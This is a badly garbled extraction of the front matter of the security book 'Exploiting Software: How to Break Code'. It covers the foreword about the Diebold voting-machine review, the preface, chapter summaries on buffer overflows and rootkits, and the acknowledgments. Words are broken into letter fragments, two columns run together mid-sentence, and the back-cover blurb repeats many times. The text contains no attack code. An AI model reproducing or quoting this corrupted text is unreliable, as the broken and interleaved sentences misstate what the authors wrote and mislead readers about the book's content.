ing bey ond t he scr ipt Atk id die Pat t r eat t f ound anyinhack ing Call book29 s,7you w ill learn abou t t ack t erm n:enBuff er Ovin er m f low an API At t ack Pat t er n: Buff er Ov er f low in Local Com m and- Lin e Ut ilit ies 29 7 Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem At t ack Pat t er n: Param et er Ex pan sion 29 8 When net w or k secur it y m ech anisms do n ot w or k At t ack Pat t er n: St ring For m at Ov er flow in syslog() 32 4 At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Foreword I n ear ly July 2 003 I r eceiv ed a call fr om Dav id Dill, a com put er scien ce pr ofessor at St anf or d Univer sit y. Dill infor m ed m e t hat t he sour ce cod e t o an elect r onic v ot ing m achine p rod uced by Sy st ems, on e of t he t op v endor s, h ad leak ed ont o t he I n t er net , and t hat • D ieb old Elect Tableion of Content s per haps it w ould be w or t h exam ining it for secu r it y vu lnerab ilit ies. This w as a rar e • I ndex opp ort unit y , because v ot ing sy st Expl oit ing Softw a re How to Br e ak Codeem m anuf act ur er s h ave been v er y t ig ht wit h t h eir pr opr iet ar y cod e. What w e fou nd w as st art lin g: Secur it y and coding f law s w er e so pr ev alent By Gr eg Hoglund , Gar y McGr aw t hat an at t ack m ight be d elay ed b ecause t h e at t acker m igh t g et st uck t r yin g t o choose fr om all t h e diff erent v ulner abilit ies t o ex ploit w it hout k now ing w here t o t u rn f ir st . ( Su ch delay er: not Addison Wesleyend ed as a secur it y st r at eg y. ) Ther e w er e lar ge, com plex ch unk s of t actPub icslish are r ecomm code w Dat it h e:no com m17, ent200 s. 4Ther e w as a sing le st at ic key h ard w ir ed int o t he cod e for encr y pt ing Pub February v ot e t allies. e -8 pseu dor andom num b er g en er at or s an d n oncr yp t ogr aphic check su ms I SBN: 0-I nsecu 20 1- 786r 95 w ere uPages: sed . 51 And 2 inspect ion of t h e CVS log s r ev ealed an ar bit r ary , seem ing ly ad h oc sour ce code m anag em ent pr ocess. And t hen t her e w ere t he ser ious flaw s. Was t h e Diebold vot in g m achine ex am ple an isolat ed incident of p oor qu alit y con t r ol? I don 't t hin k so. Many com pan ies such as Diebold ar e har d pr essed t o get t heir pr oduct s t o m ar ket befor e t heir com pet it or s. The com pan y w it h t he best , f unct ionally cor rect sy st em win s. This How div oes sof t el w are How at t acker m ake sof t wt ar e br on p urf irst pose? incent e mod r ewbr areak ds t?he comdo pany w it h st he pr oduct hat is eak available andWhy hasare t he fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he m ost f eat u res, not t h e one w it h t he m ost secur e soft w ar e. Get t ing secur it y r ight isbad v er g y uy s? What t ools can u sed ist onot b reak e? Th isDiebold book p w rov er s. dif ficult , an d t h eber esult alw soft ays war t angible. asides un lut he ck yansw : Th eir cod e w as ex am ined in a pu blic for u m and w as show n t o b e comp let ely br ok en . Most com pan ies ar e r elat ively safe Ex tphe lo iassum t in g Spt o ft w at hat re isindepend loaded wen it ht an ex aly amp eal at t ack at ttack t er ns, ools, an d in ion stles s w of ill ronly g et t os,see h eirpat code undter st r ict tnon echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e om disclosur e agr eem ent s. Only w hen t hey ar e held t o t h e fir e do com p anies pay t h e frkin d of at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . at t ent ion t o secur it y t hat is w ar ran t ed. Diebold' s v ot ing m ach ine code w as n ot t h e fir st h ig hly com plex sy st em t hat I had ever look ed at t hat w as f ull of secur it y f law s. Why is it so diff icult This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he t o pr oduce secu re sof t w ar e? scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t The an swer is sim ple. Com plexit y . An yon e w ho has ever p rog r amm ed kn ow s t hat t her e ar e un limWhy it ed num ber choices h ent inue w r it ing coda e.serAn im por t an t choice is w hich pr ogr amm ing sof t w ar se of ex ploit w illwcon t o be ious p r oblem langu age t o use. Do you w ant somet h in g t hat allow s t h e flex ib ilit y of p oint er ar it hm et ic w it h t he oppor t un it ies anu al per for opt When net w oritk allows secur itfor y mmech anisms domn ance ot w or k im izat ion, or do you w ant a t yp e- saf e langu age t h at av oids b uff er ov er flow s b ut rem ov es som e of y our p ow er ? For ev er y t ask , t h er e ar e seem ingly At t ack patinf t erinit nse choices of alg or it hm s, par am et er s, and dat a st ru ct ur es t o use. For ever y block of code, t her e ar e choices on h ow t o n am e var iables, how t o com ment , and even how tRev o lay t h e codeinin er ou se tengineer g relat ion t o t h e w hit e space ar oun d it . Ev er y pr og ram m er is dif fer en t , and ever y pr ogr am m er is lik ely t o m ak e dif fer en t choices. Lar ge soft w ar e p roj ect s acks ag er pr soft w am ar emer s hav e t o be ab le t o u nder st an d and mod ify ar e wClassic r it t en inatt teams, anainst d d iffserv er ent ogr t he cod e w rit t en by ot hers. I t is har d en ough t o man age on e' s ow n cod e, let alone soft w ar e ising t ackselse. ag ainst clien t ser soft warsecur e pr oduSur cedprby somateone Av oiding ious it y v ulnerab ilit ies in t he r esult ing code is challen ging for pr ogr am s w it h hund r ed s of lin es of cod e. For p r ogr ams w it h m illion s of lines Tech niquas es m f orodern cr aft ing s inpu of code, such opermataliciou ing syst em s,t it is im possib le. The echneical ov ,erso f low How ev er , tlarg systdet emails s m of ustb uf b efer built w es can not ju st giv e up and say t hat w r it in g su ch syst em s secur ely is imp ossible. McGr aw an d Hoglund hav e d one a mar v elou s job of Root k it s exp lain ing w hy soft w ar e is ex ploit able, of dem onst rat in g how ex ploit s w or k, an d of ed ucat ing tEx hep reader o av w rit able ig ht onder w het hery itt oisb a g ood lo i t in g on S ohow ft w atre is oid f illed witing h t ex h eploit t ools, concode. cept s,You andm kn owwledg e necessar reak idea t o dem onst r at e how ex ploit s w or k , as t h is book does. I n fact , t h er e is a t r ade of f t hat soft w ar e. secur it y p rof essionals m ust con sid er , b et w een p ublicizing ex ploit s an d k eep ing t hem qu iet . This b ook t ak es t he cor rect p osit ion t hat t he only w ay t o pr ogr am in su ch a w ay t hat m inim izes t h e v ulner abilit ies in soft w ar e is t o und er st and w hy v uln er abilit ies ex ist and h ow at t ack er s ex ploit t h em . To t his end , t his b ook is a m u st - read for an yb ody b uilding any net w or ked app licat ion or oper at ing syst em . Ex ploit ing Soft w ar e is t he best t reat m ent of an y k in d t hat I hav e seen on t he t op ic of sof t w ar e v ulner abilit ies. Gar y McGr aw and Gr eg Hoglu nd hav e a long h ist or y of t r eat ing t his sub ject . McGr aw 's fir st book , Jav a Secur it y , w as a gr oun dbr eaking look at t he secur it y pr oblem s in t h e

Jav a r un t ime en vir onm ent and t he secu rit y issues sur r ound in g t he nov el concept of u nt r ust ed m obile code r un ning inside a t ru st ed br ow ser . McGraw ' s lat er book , Build ing Secu re Soft w ar e, w as a classic, d em on st r at ing concept s t h at could be u sed t o avoid m any of t h e vu lnerab ilit ies descr ibed in t he cur r en t b ook. Hog lund has vast ex per ien ce d ev eloping r oot kit s and im plem ent in g ex ploit d ef en ses in pr act ice. Aft er r eading t h is book , y ou m ay f ind it sur pr ising not t hat so m any deploy ed sy st em s can be hack ed , bu t t h at so m an y sy st ems hav e not yet been h ack ed. Th e analy sis w e d id of an • Table of Content s elect r onic v ot ing m ach ine dem onst r at ed t hat sof t w are vu ln er abilit ies ar e all ar ound us. Th e • I ndex fact t hat m any sy st em s hav e n ot y et been ex ploit ed only m ean s t hat at t ack er s ar e sat isf ied Expl oit ing Softw a re How to Br e ak Code w it h low er h anging f ru it r ight now . This w ill be of lit t le com for t t o m e t he next t im e I go t o By Gr eg Hoglund Gar yf aced McGr aw t he polls and ,am w it h a Wind ows- b ased elect r onic v ot ing m ach in e. May be I 'll j ust mail in an ab sent ee b allot , at least t h at v ot ing t echnology ' s insecur it ies ar e not based on soft w ar e flawPub s. lish er: Addison Wesley Pub Dat e: February 17, 200 4

Av iel D. Ru bin I SBN: 0- 20 1- 786 95 -8 Associat e Pr ofessor, Com put er Science Pages: 51 2 Tech nical Dir ect or , I nf or mat ion Secur it y I nst it ut e John s Hopk ins Univ er sit y

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Preface Soft war e secu r it y is gaining m om en t um as secur it y pr of essionals r ealize t h at com put er secur it y is r eally all about m ak in g sof t w are behav e. The pu blicat ion of Build ing Secu re Soft war e in 20 01 of( Vieg a an • Table Content s d McGraw ) unleashed a nu mb er of relat ed b ooks t hat hav e cry st allized soft w ar e secu rit y as a cr it ical f ield . Already , secur it y pr ofession als, sof t w are • I ndex dev elop er s, and bu sin ess leaders are resonat ing w it h t he m essag e and asking f or m or e. Expl oit ing Softw a re How to Br e ak Code By Gr eging Hoglund GarSoft y McGr Build Secu ,re w araw e

( co- au t hor ed b y McGr aw ) is int en ded f or soft w ar e pr of essionals r angin g f r om dev eloper s t o man ager s, and is aimed at h elp in g people dev elop m ore secur e code. PubEx lishploit er: Addison ing Soft Wesley w ar e is usef ul t o t he sam e t ar get audience, bu t is r eally in t en ded for secur it yDatpe:rofFebruary essionals int 4er est ed in how t o find n ew flaw s in sof t w ar e. This book shou ld b e of Pub 17, 200 par t icular int er est t o secur it y pr act it ioners w or k ing t o b eef up t h eir sof t w are secur it y sk ills, I SBN: 0- 20 1- 786 95 -8 includin g r ed t eam s an d et h ical h acker s. Pages: 51 2 Ex ploit ing Soft w ar e is about how t o br eak code. Ou r int ent ion is t o p r ovide a r ealist ic v iew of t he t echn ical issues f aced by secu rit y pr ofessionals. Th is book is aim ed d ir ect ly t ow ard soft w ar e secu rit y as opposed t o net w or k secur it y . As secu rit y pr ofessionals com e t o gr ips w it h t he sof t w ar e secur it y pr oblem , t hey n eed t o u nder st and how sof t w are sy st em s b r eak . How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Solut ions int t o ru each t h ect e prion oblem discu ssedant inivEx fir ew alls, sionofdet sy stsem s, and ir us soft ew n ot g out g uy ploit ingwar Soft ar ek eep caninbe f ount he d inbad Build ings? Whatret ools beTh u sed reak ar soft is book rov ides t he. answ er s. Secu Soft can w ar e. e t wtoo bbooks e war m ir re? or Th imag es of peach ot her Ex pbloelieve i t in g tShat o ft w is loaded h exapp amplicat les ion of r secur eal atitt ack s, atitt ioner ack pat t er ools, an d y We sofatre w are secur itwy itand y p ract s ar e ns, in f tor a realit t echniqu used by bad s t ople br and eak sof ar e.app I f yroaches ou w antb eing t o p rot ect ed y our ar e fr om check . Thes e pr oblem is t hguy at sim popt w ular h awk by sof uptstwart t ack , y ion ou msecur u st fir n hsow eal ation t acks are really carr ou t .box t est ing t ools—bar ely "atapp licat it yst" vlear endor asr solut s—such as cann edied black scr at ch t he sur f ace. Th is book aim s t o cu t d ir ect ly t hr oug h t he hy pe t o t h e heart of t he This m ust - h ave m ay shock y ou—and t ainly. educat e y ou. Get t ing ex bey he . m at t er. We needbook t o get real ab out w hat we'itrewill up cer against Th is book describes actond ly t that scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

What This Book Is About This b ook closely ex am ines m any r eal- w orld soft w ar e exp loit s, ex plaining how and w hy t h ey w or k, t he at t ack p at t ern s t hey ar e based on, and in some cases how t hey w er e d iscov er ed. Along t he way , t h is book also show s h ow t o uncov er new soft w ar e v ulner abilit ies an d how t o •use t h em t o Table Content s b reakof m achines. •

I ndex

Expl oit ing a reibes Howwto e ak w Code Ch apt er 1Softw d escr hyBrsoft ar e is t h e r oot of t h e com p ut er secur it y p rob lem . We in t r oduce t he r inHoglund it y of t rou By Grt eg , Garble—com y McGr aw plex it y , ext en sibilit y , and conn ect iv it y—an d d escr ib e w hy t h e soft w ar e secu rit y p r oblem is gr ow in g. W e also descr ibe t h e fu t ur e of soft w ar e and it s im plicat ion s for sof t w ar e ex ploit . Pub lish er: Addison Wesley

Puber Dat2e:dFebruary 17,t he 200d 4 if fer ence bet w een im plem ent at ion bu gs an d ar chit ect ur al f law s. We Ch apt escr ibes 1- 786 95of -8 secur ing an open syst em , an d ex plain w hy r isk man agem en t is t h e discussI SBN: t he 0p r20 oblem only sane Pages:appr 51 2 oach. Tw o real- w or ld ex ploit s ar e int r odu ced: one v ery sim ple an d on e t echnically com plex . At t he hear t of Ch apt er 2 is a descr ipt ion of at t ack p at t er n s. We show how at t ack pat t er ns f it int o t he classic net w ork secur it y par adigm and descr ibe t h e r ole t hat at t ack pat t er ns play in t he r est of t he book .

The su bject of Ch apt er 3 is rev er se engineer in g. At t ack ers disassemb le, d ecom pile, and How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are deconst r uct p rog ram s t o un derst an d h ow t h ey w or k and h ow t hey can be m ade not t o. fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Ch apt er 3 d escr ibes com m on gr ay box analysis t echniqu es, in clu ding t he id ea of using a What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. secur it y p at ch as an at t ack m ap . We discuss I nt er act iv e Disassem bler ( I DA) , t h e st at e- of- t h ear tptlo ool used b ft yw hack t o und er sthand pr ogles ram We at also iscuss in pat dettail howt ools, r eal cr g Ex i t in g So a reeriss loaded w it ex amp ofs.r eal t ackds, at t ack er ns, anackin d tt echniqu ools ar ees buused ilt and used. by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . I n Ch apt ers 4, 5, 6, an d 7, w e d iscuss par t icular at t ack ex am ples t hat pr ovid e inst ances of at t ack pat-therave ns. book Th esemex les yare m ar k ed w it hcer ant ainly ast er educat isk . This m ust ayamp shock ou—and it will e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Ch apt ers 4 an d 5 cov er t he t wo ends of t h e client – ser v er mod el. Ch apt er 4 b eg ins w her e t he book Hacking Ex posed [ McClur e et al. , 1 999 ] leav es off , discu ssing t r ust ed inpu t , pr iv ilege escalat ion,sof in ject h tw r acing, ploit an d potr her at t ack t echniqu es sp ecific t o Why t w arion, e expat ploit ill con tex inue t oing be t ar ust ser, ious oblem ser v er sof t w ar e. Ch apt er 5 is about at t ackin g clien t sof t w are u sin g in - band signals, cr oss- sit e scr ipt When in g, annet dm code. pr oblem w obile or k secur it yTh meech anismsofdoback n ot wwash or k at t ack s is also int r odu ced. Bot h chapt er s ar e st ud ded w it h at t ack pat t er ns and ex am ples of r eal at t acks. At t ack pat t er ns Ch apt er 6 is about cr af t ing m alicious in put . I t goes f ar bey ond st an dar d- issue " f uzzing" t o Rev er se engineer in g t r acin g cod e, and rev ersing par ser cod e. Special at t en t ion is paid discuss par t it ion analysis, t o cr af t ing eq uivalent r eq uest s using alt er nat e en cod ing t ech niques. On ce ag ain, b ot h r ealacks ags ainst ert ack softpwat art ern e s t hat inspir e t hem ar e hig hlight ed t hr oug hout . w or ldClassic ex amp at le tex ploit an d tserv he at pr ising at tof acks ainst clienitty ,soft e The wSur h ipping boy sof tag w ar e secur t hewar d readed bu ff er ov er flow , is t h e su bj ect of Ch apt er 7. Th is ch apt er is a highly t echn ical t reat m ent of b uf fer ov er f low at t acks t hat lev erag es t he Techotniqu aft ing m aliciou s inpu t fact t hat her es t exf or t s cr supp ly t he b asics. We discuss bu ff er over flow s in em bedd ed sy st em s, dat ab ase buf fer ov erf lows, b uf fer ov er f low as t ar get ed ag ainst Jav a, an d cont en t - based b uff er Thes.t Ch echn ailsdescr of b uf fer ov er ftlow s d p ot ent ial b uff er over flow s of all k ind s, ov er f low aptical er 7det also ibes how o f in includin g st ack ov er f low s, ar it hm et ic err or s, for m at st r ing v ulner abilit ies, h eap ov er f lows, Root k it s C+ + vt ab les, and m ult ist age t ram p olin es. Pay load archit ect ur e is cover ed in det ail f or a nu for PA- RI Adveanced t echniqu su ch Ex mb p loer i t inofg plat S o ft wma s, re including is f illed witx h86t ,h MI e t PS, ools,SPARC, con ceptand s, and kn SC. ow ledg necessar y t o bes reak as act iv e arm or and t he u se of t ram polines t o defeat w eak secu r it y mechan ism s ar e also soft w ar e. cover ed. Ch apt er 7 in clu des a lar ge n um ber of at t ack pat t er ns. Ch apt er 8 is about r oot kit s—t h e ult im at e apex of soft w ar e ex ploit . This is w h at it means for a m achine t o be " ow n ed ." Ch apt er 8 cent er s ar ound code f or a real Win dow s XP r oot k it . We cover call h ooking , execut able r edir ect ion , hiding f iles an d p rocesses, net w or k supp ort , and pat chin g b inar y code. Har dw are issues ar e also discussed in det ail, in clu ding t ech niqu es u sed in t he w ild t o h id e r oot kit s in EEPROM. A n um ber of adv anced r oot k it t opics t op off Ch apt er 8. As y ou can see, Ex ploit ing Soft w ar e r u ns t h e gam ut of sof t w ar e r isk , f rom malicious inp ut t o

st ealt h y r oot k it s. Using at t ack pat t er ns, r eal code, and exam p le ex ploit s, w e clear ly dem onst r at e t he t echn iques t h at ar e used ever y day b y r eal m alicious h ack ers against soft w ar e.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

How to Use This Book This b ook is useful t o m any diff er ent kin ds of people: n et wor k ad m in ist r at or s, secur it y consult ant s, in for m at ion w ar r iors, d ev elopers, an d secur it y pr ogr am m er s. •

Table of Content s

I f you ar e r esp onsib le for a net w or k fu ll of r unn in g sof t w are, y ou should r ead t h is book I ndex o lear n tahe k inds nesses t h at ex ist in y our sy st em and how t hey ar e lik ely t o Expl oitting Softw re How to of Br eweak ak Code m anifest . By Gr eg Hoglund , Gar y McGr aw •

I f you ar e a secur it y consult ant , you shou ld r ead t his book so you can ef fect ively locat e, secur it y holes in cu st omer sy st em s.

Pubun lishderst er: Addison an d, Wesley and m easu r e Pub Dat e: February 17, 200 4

I fI SBN: you 0ar20 e 1-inv 786olved 95 -8 in off en siv e inf orm at ion w ar far e, you shou ld u se t his book t o learn how Pages:t o51p2en et r at e enem y syst em s t hr ou gh sof t w ar e. I f you cr eat e sof t w ar e for a living , y ou sh ould read t his b ook t o u nder st and how at t ack er s w ill app r oach y our cr eat ion . Today , all d ev elopers sh ould be secu rit y m ind ed . The k now ledg e here will ar m you w it h a r eal un derst and ing of t he soft war e secur it y pr oblem . How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, intar ruesion det ect sy st em iv ir us n ot knd eep in g out g uy s? I f you a secur it yion pr ogr am ms, er and wh oant k now s y soft our war waye arou code, y out he w illbad lov e t his What book t ools. can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo t inar g ySaud o ft w a re w it hisext hamp les of atram t ackms,er, at tbut ackt her pat teerarns, t ools, an d The p riim ien ce is f orloaded t h is book e secur it yr eal pr og e imp or t ant t echniquhes by com bad pu guy o ofession br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om t ers tpr als. lessons er eused f or all at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

But Isn't This Too Dangerous? I t 's im p ort an t t o emp hasize t hat non e of t he inf or mat ion w e d iscuss her e is new s t o t he hack er com m un it y. Som e of t hese t echn iq ues ar e as old as t he h ills. Our r eal obj ect iv e is t o pr ov ide som e ey e- opening inf or mat ion and u p t h e lev el of discour se in sof t w are secur it y. •

Table of Content s

•Som e secur itI ndex y ex pert s may w orr y t h at r evealing t he t echn iq ues descr ibed in t his book w ill Expl oit ing Softw How to Br encour age m ora re e people t oe ak t r yCode t hem ou t . Per haps t h is is t r ue, bu t h ack ers hav e alw ays h ad bet er Hoglund lines of, Gar com mu nicat By Grt eg y McGr aw ion an d in for m at ion shar ing t h an t h e good gu ys. Th is infor m at ion needs t o be u nder st ood an d d igest ed by secur it y pr ofession als so t hat t hey k now t he m agnit u de of t h e pr oblem and t h ey can begin t o ad dr ess it pr oper ly. Sh all w e gr ab t he b ull Pub lish er: Addison Wesley by t he hor ns or pu t our head in t h e san d? Pub Dat e: February 17, 200 4 I SBN: 20 1- 786 Perh aps t h is0- book w95 ill-8shock y ou. No m at t er w hat , it w ill ed ucat e y ou. Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Acknowledgments This b ook t ook a lon g t ime t o w r it e. Many p eop le help ed , bot h d ir ect ly and indir ect ly . We r et ain t h e blam e for any er ror s an d om ission s her ein, but w e w ant t o shar e t h e credit w it h t• hose w h o hav e dir ly insfluenced our w or k. Table of ect Content •

I ndex

The f ollow in g p eop le pr ov id ed h elpf ul r ev iew s t o ear ly d raf t s of t h is book : Alex Ant onov , Expl oit ing Softw a re How to Br e ak Code Richar d Bej t lich , Nish ch al Bhalla, An t on Chuv ak in, Greg Cum m ings, Marcus Leech, CC By Gr eg Hoglund , GarRan y McGr Michael, Mar cus umaw , John St ev en , Walt St onebur ner , Herb er t Thom pson, Kart ik Tr iv ed i, Adam Young , and a n um ber of anon ym ous rev iew er s. Pub lish er: Addison Wesley

Finally, w e: e owe our17,gr200 at it4u de t o t he f ine people at Add ison- Wesley, especially ou r edit or , Pub Dat February Kar en IGet t m an, and her t w o assist ant s, Em ily Fr ey an d Elizabet h Zd unich. Thank s f or put t ing SBN: 0- 20 1- 786 95 -8 up w it h t he seem ing ly en dless p r ocess as w e w and er ed our w ay t o com p let ion. Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Greg's Acknowledgments First and for emost I ackn ow ledg e m y bu siness par t n er an d now w ife, Penn y. This w or k w ould not hav e been possible w it h out her suppor t . Big t h ank s t o m y d augh t er Kelsey t oo! Alon g t he w ay , m any people h ave off er ed t heir t ime and t ech nical kn ow - how . A big t hank s t o Mat t •Har get t f or com Tableinof g Content up w it hs a k iller idea an d h avin g t h e hist or ical perspect ive need ed f or •success. Also, I ndex t hank s t o Shaw n Br ack en an d Jon Gary for sit t ing it out in m y gar age and Expl oit ing re How e ak. Code using an Softw old daoor for to a dBresk Than ks t o Halvar Flak e f or st rik ing m y int er est in I DA plugin s and being a healt abrawasion. Th ank s t o D avid Ait el and ot her m em bers of 0dd for pr ovid in g By Gr eg Hoglund , Gar yhy McGr t echnical f eedb ack on shell code t echniq ues. Thank s t o Jam ie But ler for ex cellent root k it skills, and t o Jef f and Ping Moss, and t he wh ole Black Hat f am ily . Pub lish er: Addison Wesley Dat e: February 17, 200 4 Gar Pub y McGr aw h as been in st r u ment al in g et t in g t his book pub lished—b ot h by being a t ask I 20 1786ing 95 -8t h e cr edibilit y t h at t h is su bj ect need s. Much of my k now ledg e is selfm ast er SBN: and 0-by hav 2 y add s an und er ly in g acad em ic st r uct ur e t o t he w or k . Gar y is a ver y dir ect , t aug htPages: and 51 Gar " no BS" k ind of per son . This, b ack ed u p wit h his deep k now led ge of t h e su bj ect mat t er , w elds nat u r ally w it h m y t ech nical m at erial. Gary is also a good f riend .

